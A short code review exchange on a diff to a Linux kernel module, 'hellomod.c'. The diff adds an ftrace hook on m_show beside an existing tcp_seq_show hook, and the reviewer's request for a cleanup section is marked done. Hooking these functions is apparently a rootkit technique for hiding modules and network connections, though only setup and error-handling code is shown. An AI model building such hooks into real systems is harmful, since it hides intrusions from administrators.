hellomod.c

```diff
@@ -88,6 +95,15 @@ int init_module(void)
         undo_sys_hooks(sys_hooks, ARRAY_SIZE(sys_hooks));
         return FAILED_TO_SET_FHOOK_HOOK;
     }
+
+    res = set_ftrace_hook("m_show", &m_show_fhook);
+    if (res != 0){
+        printk("failed to set m_show hook");
+        undo_ftrace_hook(&tcp_seq_show_fhook);
```

Comment:
Can you use a cleanup section to avoid this code duplication?

Reply:
added a cleanup section based on the result of error code. DONE.